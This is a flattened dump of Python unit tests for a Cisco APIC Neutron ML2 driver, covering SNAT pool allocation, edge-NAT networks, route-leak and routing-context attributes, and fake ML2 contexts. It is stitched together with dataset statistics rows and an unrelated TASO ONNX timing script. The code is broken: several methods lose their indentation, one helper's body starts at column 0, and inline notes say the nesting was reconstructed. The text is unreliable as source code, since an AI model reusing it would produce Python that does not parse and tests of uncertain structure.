                                  'device_id': ['h1']})
                # Still one SNAT pool port for h1: the IP was reused
                self.assertEqual(1, len(snat_ports))
            # Now simulate event of a second host
            host_arg = {'binding:host_id': 'h2'}
            with self.port(subnet=sub, tenant_id='anothertenant',
                           device_owner='compute:', device_id='someid',
                           arg_list=(portbindings.HOST_ID,), **host_arg) as p3:
                p3 = p3['port']
                self.assertEqual(net['id'], p3['network_id'])
                details = self.driver.get_gbp_details(
                    ctx, device='tap%s' % p3['id'], host='h2')
                host_snat_ips = details['host_snat_ips']
                self.assertEqual(1, len(host_snat_ips))
                self.assertEqual(db_net['name'],
                                 host_snat_ips[0]['external_segment_name'])
                self._check_ip_in_cidr(host_snat_ips[0]['host_snat_ip'], hcidr)
                self.assertEqual('192.168.0.1',
                                 host_snat_ips[0]['gateway_ip'])
                self.assertEqual(
                    netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                    host_snat_ips[0]['prefixlen'])
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id],
                                  'device_id': ['h2']})
                # One dedicated SNAT pool port for h2
                self.assertEqual(1, len(snat_ports))
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id]})
            # Two pool ports in total: one per host
            self.assertEqual(2, len(snat_ports))
            self.driver.delete_network_postcommit(net_ctx)
            # Deleting the external network cleans up SNAT ports, the
            # internal SNAT network and its pool subnet.
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id]})
            self.assertEqual(0, len(snat_ports))
            snat_networks = self.driver.db_plugin.get_networks(
                ctx, filters={'name': [self.driver._get_snat_db_network_name(
                    db_net)]})
            self.assertEqual(0, len(snat_networks))
            subnets = self.driver.db_plugin.get_subnets(
                ctx, filters={'name': [acst.HOST_SNAT_POOL]})
            self.assertEqual(0, len(subnets))
    def test_1_port_created_for_host_edge_nat(self):
        """No host SNAT IP, pool port or ip_mapping for an edge-nat network."""
        # This test case is more of a functional test and should be revisited.
        ctx = context.get_admin_context()
        agent = {'host': 'h1'}
        agent.update(AGENT_CONF)
        self.actual_core_plugin.create_or_update_agent(ctx, agent)
        args = {'network': {'name': mocked.APIC_NETWORK_EDGE_NAT + '-name',
                            'admin_state_up': True, 'shared': True,
                            'status': n_constants.NET_STATUS_ACTIVE,
                            'tenant_id': 'onetenant',
                            'router:external': True}}
        db_net = self.driver.db_plugin.create_network(ctx, args)
        net_ctx = self._get_network_context(self.actual_core_plugin,
                                            ctx.tenant_id,
                                            db_net['id'],
                                            TEST_SEGMENT1, external=True)
        self.driver.create_network_postcommit(net_ctx)
        snat_networks = self.driver.db_plugin.get_networks(
            ctx, filters={'name': [self.driver._get_snat_db_network_name(
                db_net)]})
        snat_network_id = snat_networks[0]['id']
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='10.0.0.0/24',
            ip_version=4, is_admin_context=True)
        host_arg = {'binding:host_id': 'h2'}
        with self.port(subnet=sub, tenant_id='anothertenant',
                       device_owner='compute:', device_id='someid',
                       arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # We need the db_plugin to get invoked from the code being
            # tested. However, this was earlier mocked out in the setup,
            # hence we reset it here.
            self.driver.db_plugin._device_to_port_id = (
                self.actual_core_plugin._device_to_port_id)
            self.driver.db_plugin.get_bound_port_context = (
                self.actual_core_plugin.get_bound_port_context)
            self.driver.db_plugin.get_agents = (
                self.actual_core_plugin.get_agents)
            self.driver.db_plugin.create_or_update_agent = (
                self.actual_core_plugin.create_or_update_agent)
            self.driver._is_nat_enabled_on_ext_net = mock.Mock()
            self.driver._is_connected_to_ext_net = mock.Mock()
            self.driver.agent_type = 'Open vSwitch agent'
            details = self.driver.get_gbp_details(
                ctx, device='tap%s' % p1['id'], host='h1')
            host_snat_ips = details['host_snat_ips']
            # No host SNAT IP is handed out for this network
            self.assertEqual(0, len(host_snat_ips))
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id],
                              'device_id': ['h1']})
            # ... and no SNAT pool port was allocated
            self.assertEqual(0, len(snat_ports))
            ipms = details['ip_mapping']
            self.assertEqual(0, len(ipms))
def _create_snat_network(self, ctx, tenant_id):
args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
'admin_state_up': True, 'shared': True,
'status': n_constants.NET_STATUS_ACTIVE,
'tenant_id': tenant_id,
'router:external': True}}
db_net = self.driver.db_plugin.create_network(ctx, args)
net_ctx = self._get_network_context(self.actual_core_plugin,
ctx.tenant_id,
db_net['id'],
TEST_SEGMENT1, external=True)
self.driver.create_network_postcommit(net_ctx)
return db_net, net_ctx
    def _snat_mock_setup(self, tenant_id):
        """Wire up the mocks/real methods needed by the edge-nat SNAT tests."""
        self.driver._is_edge_nat = mock.Mock(return_value=True)
        self.driver._is_pre_existing = mock.Mock(return_value=False)
        # APIC tenant-name lookup returns the given tenant id
        self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
            return_value=tenant_id)
        # We need the db_plugin to get invoked from the code being
        # tested. However, this was earlier mocked out in the setup,
        # hence we reset it here.
        self.driver.db_plugin._device_to_port_id = (
            self.actual_core_plugin._device_to_port_id)
        self.driver.db_plugin.get_bound_port_context = (
            self.actual_core_plugin.get_bound_port_context)
        self.driver.db_plugin.get_agents = (
            self.actual_core_plugin.get_agents)
        self.driver.db_plugin.create_or_update_agent = (
            self.actual_core_plugin.create_or_update_agent)
        self.driver._is_nat_enabled_on_ext_net = mock.Mock()
        self.driver._is_connected_to_ext_net = mock.Mock()
        self.driver.agent_type = 'Open vSwitch agent'
def test_1_snat_ip_created_for_vrf_edge_nat(self):
    """A single VRF gets exactly one SNAT pool port, reused across events.

    Repeated port events on the same host/VRF and on a second host with
    the same VRF must all return the originally allocated SNAT IP, and
    deleting the external network must clean up all SNAT resources.
    NOTE(review): `with` nesting reconstructed from statement order —
    confirm against upstream source.
    """
    # This test case is more of a functional test and should be revisited.
    TEST_TENANT_ID1 = 'onetenant'
    TEST_TENANT_ID2 = 'anothertenant'
    self._snat_mock_setup(TEST_TENANT_ID1)
    ctx = context.get_admin_context()
    agent = {'host': 'h1'}
    agent.update(AGENT_CONF)
    self.actual_core_plugin.create_or_update_agent(ctx, agent)
    db_net, net_ctx = self._create_snat_network(ctx, TEST_TENANT_ID1)
    snat_networks = self.driver.db_plugin.get_networks(
        ctx, filters={'name': [self.driver._get_snat_db_network_name(
            db_net)]})
    snat_network_id = snat_networks[0]['id']
    net = self.create_network(
        tenant_id=TEST_TENANT_ID1, expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    sub = self.create_subnet(
        network_id=net['id'], cidr='10.0.0.0/24',
        ip_version=4, is_admin_context=True)
    host_arg = {'binding:host_id': 'h2'}
    hcidr = self.driver.apic_manager.ext_net_dict[
        db_net['name']]['host_pool_cidr']
    # Create port with a different tenant
    with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
                   device_owner='compute:', device_id='someid',
                   arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
        port1 = p1['port']
        self.assertEqual(net['id'], port1['network_id'])
        details = self.driver.get_snat_ip_for_vrf(ctx,
                                                  TEST_TENANT_ID1, db_net)
        # Verify that the port has an SNAT IP, which is
        # allocated in the SNAT network tenant ID
        self.assertEqual(db_net['name'],
                         details['external_segment_name'])
        self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
        self.assertEqual('192.168.0.1', details['gateway_ip'])
        self.assertEqual(
            netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
            details['prefixlen'])
        # SNAT pool ports are keyed by VRF (device_id = tenant).
        snat_ports = self.driver.db_plugin.get_ports(
            ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                          'network_id': [snat_network_id],
                          'device_id': [TEST_TENANT_ID1]})
        self.assertEqual(1, len(snat_ports))
        # Simulate a second event on the same host with the same VRF for
        # the same external network to check if the earlier allocated SNAT
        # IP is returned
        with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
                       device_owner='compute:', device_id='someid',
                       arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
            port2 = p2['port']
            self.assertEqual(net['id'], port2['network_id'])
            details = self.driver.get_snat_ip_for_vrf(ctx,
                                                      TEST_TENANT_ID1,
                                                      db_net)
            self.assertEqual(db_net['name'],
                             details['external_segment_name'])
            self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
            self.assertEqual('192.168.0.1', details['gateway_ip'])
            self.assertEqual(
                netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                details['prefixlen'])
            # Still only one pool port for this VRF.
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id],
                              'device_id': [TEST_TENANT_ID1]})
            self.assertEqual(1, len(snat_ports))
            # Now simulate event of a second host with same VRF
            host_arg = {'binding:host_id': 'h2'}
            with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
                           device_owner='compute:', device_id='someid',
                           arg_list=(portbindings.HOST_ID,),
                           **host_arg) as p3:
                port3 = p3['port']
                self.assertEqual(net['id'], port3['network_id'])
                details = self.driver.get_snat_ip_for_vrf(ctx,
                                                          TEST_TENANT_ID1,
                                                          db_net)
                self.assertEqual(db_net['name'],
                                 details['external_segment_name'])
                self._check_ip_in_cidr(details['host_snat_ip'], hcidr)
                self.assertEqual('192.168.0.1',
                                 details['gateway_ip'])
                self.assertEqual(
                    netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                    details['prefixlen'])
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id],
                                  'device_id': [TEST_TENANT_ID1]})
                self.assertEqual(1, len(snat_ports))
                # Exactly one pool port exists overall (single VRF).
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id]})
                self.assertEqual(1, len(snat_ports))
                self.driver.delete_network_postcommit(net_ctx)
                # Deleting the external net removes SNAT ports, the SNAT
                # network, and the host pool subnet.
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id]})
                self.assertEqual(0, len(snat_ports))
                snat_networks = self.driver.db_plugin.get_networks(
                    ctx, filters={'name': [
                        self.driver._get_snat_db_network_name(
                            db_net)]})
                self.assertEqual(0, len(snat_networks))
                subnets = self.driver.db_plugin.get_subnets(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL]})
                self.assertEqual(0, len(subnets))
def test_2_snat_ips_created_for_2_vrfs_edge_nat(self):
    """Two distinct VRFs on one external network get one SNAT port each.

    Exercises allocation for two tenants (VRFs), re-use of each VRF's
    allocation, and full cleanup when the external network is deleted.
    NOTE(review): `with` nesting reconstructed from statement order —
    confirm against upstream source.
    """
    # This test case is more of a functional test and should be revisited.
    TEST_TENANT_ID1 = 'onetenant'
    TEST_TENANT_ID2 = 'anothertenant'
    self._snat_mock_setup(TEST_TENANT_ID1)
    ctx = context.get_admin_context()
    agent = {'host': 'h1'}
    agent.update(AGENT_CONF)
    self.actual_core_plugin.create_or_update_agent(ctx, agent)
    db_net, net_ctx = self._create_snat_network(ctx, TEST_TENANT_ID1)
    snat_networks = self.driver.db_plugin.get_networks(
        ctx, filters={'name': [self.driver._get_snat_db_network_name(
            db_net)]})
    snat_network_id = snat_networks[0]['id']
    net = self.create_network(
        tenant_id=TEST_TENANT_ID1, expected_res_status=201, shared=True,
        is_admin_context=True)['network']
    sub = self.create_subnet(
        network_id=net['id'], cidr='10.0.0.0/24',
        ip_version=4, is_admin_context=True)
    host_arg = {'binding:host_id': 'h2'}
    # Create port with a different tenant
    with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
                   device_owner='compute:', device_id='someid',
                   arg_list=(portbindings.HOST_ID,), **host_arg) as p1:
        port1 = p1['port']
        self.assertEqual(net['id'], port1['network_id'])
        self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
            return_value=TEST_TENANT_ID2)
        details = self.driver.get_snat_ip_for_vrf(ctx,
                                                  TEST_TENANT_ID2, db_net)
        # Verify that the port has an SNAT IP, which is
        # allocated in the SNAT network tenant ID
        self.assertEqual(db_net['name'],
                         details['external_segment_name'])
        hcidr = self.driver.apic_manager.ext_net_dict[
            db_net['name']]['host_pool_cidr']
        self._check_ip_in_cidr(
            details['host_snat_ip'], hcidr)
        self.assertEqual('192.168.0.1',
                         details['gateway_ip'])
        self.assertEqual(
            netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
            details['prefixlen'])
        # Pool ports are keyed by VRF (device_id = tenant).
        snat_ports = self.driver.db_plugin.get_ports(
            ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                          'network_id': [snat_network_id],
                          'device_id': [TEST_TENANT_ID2]})
        self.assertEqual(1, len(snat_ports))
        # Simulate a second event on the same host with the a different VRF
        # for the same external network to check if the earlier allocated
        # SNAT IP is returned
        with self.port(subnet=sub, tenant_id=TEST_TENANT_ID1,
                       device_owner='compute:', device_id='someid',
                       arg_list=(portbindings.HOST_ID,), **host_arg) as p2:
            port2 = p2['port']
            self.assertEqual(net['id'], port2['network_id'])
            self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
                return_value=TEST_TENANT_ID1)
            details = self.driver.get_snat_ip_for_vrf(ctx,
                                                      TEST_TENANT_ID1,
                                                      db_net)
            self.assertEqual(db_net['name'],
                             details['external_segment_name'])
            self._check_ip_in_cidr(
                details['host_snat_ip'], hcidr)
            self.assertEqual('192.168.0.1',
                             details['gateway_ip'])
            self.assertEqual(
                netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                details['prefixlen'])
            snat_ports = self.driver.db_plugin.get_ports(
                ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                              'network_id': [snat_network_id],
                              'device_id': [TEST_TENANT_ID1]})
            self.assertEqual(1, len(snat_ports))
            # Now simulate event of a second host with same VRF
            host_arg = {'binding:host_id': 'h2'}
            with self.port(subnet=sub, tenant_id=TEST_TENANT_ID2,
                           device_owner='compute:', device_id='someid',
                           arg_list=(portbindings.HOST_ID,),
                           **host_arg) as p3:
                port3 = p3['port']
                self.assertEqual(net['id'], port3['network_id'])
                self.driver.apic_manager.apic.fvTenant.name = mock.Mock(
                    return_value=TEST_TENANT_ID2)
                details = self.driver.get_snat_ip_for_vrf(ctx,
                                                          TEST_TENANT_ID2,
                                                          db_net)
                self.assertEqual(db_net['name'],
                                 details['external_segment_name'])
                self._check_ip_in_cidr(
                    details['host_snat_ip'], hcidr)
                self.assertEqual('192.168.0.1',
                                 details['gateway_ip'])
                self.assertEqual(
                    netaddr.IPNetwork(mocked.HOST_POOL_CIDR).prefixlen,
                    details['prefixlen'])
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id],
                                  'device_id': [TEST_TENANT_ID2]})
                self.assertEqual(1, len(snat_ports))
                # One pool port per VRF -> two in total.
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id]})
                self.assertEqual(2, len(snat_ports))
                self.driver.delete_network_postcommit(net_ctx)
                # Full cleanup on external network deletion.
                snat_ports = self.driver.db_plugin.get_ports(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL_PORT],
                                  'network_id': [snat_network_id]})
                self.assertEqual(0, len(snat_ports))
                snat_networks = self.driver.db_plugin.get_networks(
                    ctx, filters={'name': [
                        self.driver._get_snat_db_network_name(
                            db_net)]})
                self.assertEqual(0, len(snat_networks))
                subnets = self.driver.db_plugin.get_subnets(
                    ctx, filters={'name': [acst.HOST_SNAT_POOL]})
                self.assertEqual(0, len(subnets))
def test_create_external_network_postcommit(self):
    """create_network_postcommit on an external net builds the shadow SNAT
    network (with one segment and one host pool subnet), and
    delete_network_postcommit tears all of it down again.
    """
    ctx = context.get_admin_context()
    args = {'network': {'name': mocked.APIC_NETWORK_HOST_SNAT + '-name',
                        'admin_state_up': True, 'shared': True,
                        'tenant_id': 'onetenant',
                        'status': n_constants.NET_STATUS_ACTIVE}}
    db_net = self.driver.db_plugin.create_network(ctx, args)
    net_ctx = self._get_network_context(self.actual_core_plugin,
                                        ctx.tenant_id,
                                        db_net['id'],
                                        TEST_SEGMENT1, external=True)
    self.driver.create_network_postcommit(net_ctx)
    # Shadow SNAT network must exist with exactly one segment...
    snat_networks = self.driver.db_plugin.get_networks(
        ctx,
        filters={'name': [self.driver._get_snat_db_network_name(db_net)]})
    snat_net_id = snat_networks[0]['id']
    self.assertEqual(1, len(snat_networks))
    seg = ml2_db.get_network_segments(ctx.session, snat_net_id)
    self.assertEqual(1, len(seg))
    # ...and exactly one host SNAT pool subnet.
    subnets = self.driver.db_plugin.get_subnets(
        ctx, filters={'name': [acst.HOST_SNAT_POOL]})
    self.assertEqual(1, len(subnets))
    self.driver.delete_network_postcommit(net_ctx)
    # Everything is removed with the external network.
    snat_networks = self.driver.db_plugin.get_networks(
        ctx,
        filters={'name': [self.driver._get_snat_db_network_name(db_net)]})
    self.assertEqual(0, len(snat_networks))
    seg = ml2_db.get_network_segments(ctx.session, snat_net_id)
    self.assertEqual(0, len(seg))
    subnets = self.driver.db_plugin.get_subnets(
        ctx, filters={'name': [acst.HOST_SNAT_POOL]})
    self.assertEqual(0, len(subnets))
class TestCiscoApicMechDriverNoFabricL3(TestApicML2IntegratedPhysicalNode):
    """Driver tests with the reference (non-fabric) L3 plugin configured,
    i.e. routing and subnet programming on the ACI fabric are disabled.
    """

    def setUp(self, service_plugins=None, ml2_opts=None):
        # Mock out HA scheduler notifications
        # (irrelevant exceptions if it's not)
        self._update_notify = mock.patch(
            'neutron.db.l3_hascheduler_db._notify_l3_agent_ha_port_update')
        self._update_notify.start()
        # Configure reference L3 implementation, which
        # disables routing and subnet configuration in the ACI fabric
        super(TestCiscoApicMechDriverNoFabricL3, self).setUp(
            service_plugins={
                'L3_ROUTER_NAT': 'router',
                'flavors_plugin_name': 'neutron.services.flavors.'
                                       'flavors_plugin.FlavorsPlugin'})

    def tearDown(self):
        self._update_notify.stop()
        super(TestCiscoApicMechDriverNoFabricL3, self).tearDown()

    def test_create_subnet_no_l3(self):
        """Subnets/routers must not be programmed on APIC in this mode;
        only path/BD handling for non-OpFlex hosts happens.
        """
        ctx = context.get_admin_context()
        tenant1 = self._tenant(neutron_tenant='onetenant')
        app_prof1 = self._app_profile(neutron_tenant='onetenant')
        self.mgr.ensure_bd_created_on_apic = mock.Mock()
        self._register_agent('h1', agent_cfg=AGENT_CONF_OPFLEX)
        # Create a network with a subnet, then add
        # a port to the subnet and bind it to a host
        # (e.g. as if Nova did a port binding for a VM port)
        net = self.create_network(
            tenant_id='onetenant', is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub, tenant_id='onetenant') as p1:
            p1 = p1['port']
            # BD created without unicast routing (no fabric L3).
            self.mgr.ensure_bd_created_on_apic.assert_called_once_with(
                tenant1, mock.ANY,
                ctx_owner=mock.ANY,
                ctx_name=self._network_vrf_name(net_name=net['id']),
                transaction='transaction', unicast_route=False)
            # bind to VM-host
            self._bind_port_to_host(p1['id'], 'h1')
            bseg_p1, bdriver = self._get_bound_seg(p1['id'])
            self.assertEqual(bseg_p1['network_type'], 'opflex')
            self.assertEqual('cisco_apic_ml2', bdriver)
            # We shouldn't be using a PhysDom for opflex network
            # type ports -- make sure we didn't use one
            self.mgr.ensure_path_created_for_port.assert_not_called()
            # Create a router and add an interface from
            # the subnet we created above. Make explicit call for
            # port binding for the newly created router port as well.
            router = self.create_router(api=self.ext_api,
                                        tenant_id='onetenant',
                                        is_admin_context=True)['router']
            self.l3_plugin.add_router_interface(
                ctx, router['id'], {'subnet_id': sub['subnet']['id']})
            self.mgr.ensure_subnet_created_on_apic.assert_not_called()
            router_port = self.driver.db_plugin.get_ports(
                ctx, filters={'device_id': [router['id']],
                              'network_id': [net['id']]})[0]
            self.mgr.ensure_path_created_for_port.reset_mock()
            # Bind the port to a host that's not running OpFlex.
            self._bind_port_to_host(p1['id'], 'lb-app-01')
            self.mgr.ensure_path_created_for_port.assert_called()
            bseg_p1, bdriver = self._get_bound_seg(p1['id'])
            self.assertEqual(1, len(self._query_dynamic_seg(net['id'])))
            self.mgr.ensure_path_created_for_port.assert_called_once_with(
                tenant1, net['id'], 'lb-app-01',
                bseg_p1['segmentation_id'],
                bd_name=None, app_profile_name=app_prof1,
                transaction=mock.ANY)
            self.l3_plugin.remove_router_interface(
                ctx, router['id'], {'port_id': router_port['id']})
            # Deleting the port releases the dynamic segment and the path.
            self.delete_port(p1['id'], tenant_id=p1['tenant_id'])
            self.assertEqual(0, len(self._query_dynamic_seg(net['id'])))
            self.mgr.ensure_path_deleted_for_port.assert_called_once_with(
                tenant1, net['id'], 'lb-app-01',
                app_profile_name=app_prof1)

    def test_no_l3_in_gbp_details(self):
        """GBP port details must omit all L3/NAT info in this mode."""
        self._register_agent('h1')
        self.driver._get_tenant_vrf = mock.MagicMock()
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201, shared=True,
            is_admin_context=True)['network']
        sub = self.create_subnet(
            network_id=net['id'], cidr='192.168.0.0/24',
            ip_version=4, is_admin_context=True)
        with self.port(subnet=sub, tenant_id='anothertenant') as p1:
            p1 = p1['port']
            self.assertEqual(net['id'], p1['network_id'])
            # Bind port to trigger path binding
            self._bind_port_to_host(p1['id'], 'h1')
            self.driver._add_ip_mapping_details = mock.Mock()
            details = self._get_gbp_details(p1['id'], 'h1')
            self.assertEqual(self._tenant(neutron_tenant='onetenant'),
                             details['ptg_tenant'])
            self.assertEqual(self._app_profile(neutron_tenant='onetenant'),
                             details['app_profile_name'])
            self.assertEqual('onetenant',
                             details['tenant_id'])
            self.assertTrue(details['enable_dhcp_optimization'])
            self.assertEqual(1, len(details['subnets']))
            self.assertEqual(sub['subnet']['id'],
                             details['subnets'][0]['id'])
            # No NAT/L3 details should be present.
            self.assertIsNone(details.get('ip_mapping'))
            self.assertIsNone(details.get('floating_ip'))
            self.assertIsNone(details.get('host_snat_ips'))
            self.driver._get_tenant_vrf.assert_called_with(net['tenant_id'])

    def test_phys_port_on_shared_public_opflex_network(self):
        # Inherited test is not applicable without fabric L3; disable it.
        pass
class TestExtensionAttributes(ApicML2IntegratedTestBase):
    """Lifecycle tests for the APIC extension attributes
    (apic:allow_route_leak on networks, apic:use_routing_context on
    routers).
    """

    def test_route_leak_network_lifecycle(self):
        # Default: route leak disabled on a newly created network.
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201)['network']
        self.assertEqual(False,
                         net[ALLOW_ROUTE_LEAK])
        net = self.create_network(
            tenant_id='onetenant', expected_res_status=201,
            **{'apic:allow_route_leak': 'True'})['network']
        self.assertEqual(True,
                         net[ALLOW_ROUTE_LEAK])
        # update is not allowed
        self.update_network(
            net['id'], expected_res_status=400,
            **{'apic:allow_route_leak': 'False'})
        self.assertEqual(True,
                         net[ALLOW_ROUTE_LEAK])
        self.delete_network(net['id'], tenant_id=net['tenant_id'])
        # Extension DB rows are cleaned up with the network.
        session = db_api.get_session()
        extn = extn_db.ExtensionDbMixin()
        self.assertFalse(extn.get_network_extn_db(session, net['id']))

    def test_router_lifecycle(self):
        session = db_api.get_session()
        extn = extn_db.ExtensionDbMixin()
        # default value
        rtr0 = self.create_router(api=self.ext_api,
                                  expected_res_status=201)['router']
        self.assertEqual(None, rtr0[USE_ROUTING_CONTEXT])
        self.assertFalse(extn.get_router_extn_db(session, rtr0['id']))
        # bad value
        self.create_router(api=self.ext_api,
                           expected_res_status=400,
                           **{'apic:use_routing_context': '12345'})
        self.create_router(api=self.ext_api,
                           expected_res_status=500,
                           **{'apic:use_routing_context':
                              '39266936-70b8-437b-b779-74ae099ff0db'})
        # good value
        rtr1 = self.create_router(api=self.ext_api,
                                  expected_res_status=201,
                                  **{'apic:use_routing_context': rtr0['id']}
                                  )['router']
        self.assertEqual(rtr0['id'], rtr1[USE_ROUTING_CONTEXT])
        self.assertEqual(extn.get_router_extn_db(session, rtr1['id']),
                         {'apic:use_routing_context': rtr0['id']})
        # can't delete rtr0 now
        self.delete_router(rtr0['id'], api=self.ext_api,
                           expected_res_status=500)
        # update is not allowed
        self.update_router(
            rtr1['id'], api=self.ext_api,
            expected_res_status=400,
            **{'apic:use_routing_context': rtr1['id']})
        # deletion
        self.delete_router(rtr1['id'], api=self.ext_api,
                           expected_res_status=204)
        # can delete rtr0 now after rtr1 is gone
        self.delete_router(rtr0['id'], api=self.ext_api,
                           expected_res_status=204)
        self.assertFalse(extn.get_router_extn_db(session, rtr1['id']))
class FakeNetworkContext(object):
    """Minimal stand-in for an ML2 NetworkContext (tests only)."""

    def __init__(self, network, segments):
        self._plugin_context = mock.Mock()
        self._network, self._segments = network, segments

    @property
    def current(self):
        # The network dict this context wraps.
        return self._network

    @property
    def network_segments(self):
        return self._segments
class FakeSubnetContext(object):
    """Minimal stand-in for an ML2 SubnetContext (tests only)."""

    def __init__(self, subnet, network):
        self._subnet, self._network = subnet, network
        self._plugin = mock.Mock()
        self._plugin_context = mock.Mock()
        # The mocked core plugin hands back the owning network's dict.
        self._plugin.get_network.return_value = network.current

    @property
    def current(self):
        # The subnet dict this context wraps.
        return self._subnet

    @property
    def network(self):
        return self._network
class FakePortContext(object):
    """Minimal stand-in for an ML2 PortContext (tests only)."""

    def __init__(self, port, network):
        self._port = port
        self._network = network
        self._plugin = mock.Mock()
        self._plugin_context = mock.Mock()
        self._plugin.get_ports.return_value = []
        # Bind to the network's first segment when one exists.
        segments = network.network_segments
        self._bound_segment = segments[0] if segments else None
        self.current = self._port
        self.original = self._port
        self.network = self._network
        self.top_bound_segment = self._bound_segment
        self.bottom_bound_segment = self._bound_segment
        self.host = self._port.get(portbindings.HOST_ID)
        # A fresh context carries no "original" (pre-update) state.
        self.original_host = None
        self.original_top_bound_segment = None
        self.original_bottom_bound_segment = None
        self._binding = mock.Mock()
        self._binding.segment = self._bound_segment

    def set_binding(self, segment_id, vif_type, cap_port_filter):
        # Intentionally a no-op: tests never exercise real binding.
        pass
| 49.295873
| 79
| 0.573653
| 30,448
| 267,578
| 4.684314
| 0.030872
| 0.03716
| 0.023221
| 0.015144
| 0.848228
| 0.822349
| 0.796513
| 0.768026
| 0.741047
| 0.7165
| 0
| 0.020725
| 0.323229
| 267,578
| 5,427
| 80
| 49.304957
| 0.766888
| 0.026762
| 0
| 0.70792
| 0
| 0.000845
| 0.081062
| 0.008536
| 0
| 0
| 0
| 0
| 0.103062
| 1
| 0.046463
| false
| 0.000845
| 0.007814
| 0.003379
| 0.067371
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7d263b24f95b58b7b22856e2e314d24bf4c2b06b
| 377
|
py
|
Python
|
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
taso-examples/debug.py
|
kooyunmo/taso-torch
|
fcc833c9561c7d315875ad25059860240b4b08da
|
[
"Apache-2.0"
] | null | null | null |
import taso
import onnx  # NOTE(review): unused here, but kept -- TASO's ONNX loader may rely on it


def _report_runtimes(model_path):
    """Load *model_path* with TASO and print its measured runtimes."""
    graph = taso.load_onnx(model_path)
    print("graph.run_time(): {}ms".format(graph.run_time()))
    print("graph.run_forward(): {}ms".format(graph.run_forward()))


# Compare the original model against its TASO-optimized counterpart.
for _path in ('onnx_models/resnext50.onnx',
              'onnx_models/resnext50_taso.onnx'):
    _report_runtimes(_path)
| 34.272727
| 62
| 0.734748
| 57
| 377
| 4.631579
| 0.22807
| 0.242424
| 0.19697
| 0.242424
| 0.909091
| 0.909091
| 0.909091
| 0.636364
| 0.636364
| 0.636364
| 0
| 0.011204
| 0.05305
| 377
| 10
| 63
| 37.7
| 0.728291
| 0
| 0
| 0.5
| 0
| 0
| 0.400531
| 0.151194
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.5
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
adf63c30e8b4f72290a437effe7310d8c445a123
| 73,038
|
py
|
Python
|
ptsemseg/trainer.py
|
PhyllisH/MultiAgentPerception
|
f73b8131cd4314c42f09d3502bd63d434a4ec219
|
[
"MIT"
] | 30
|
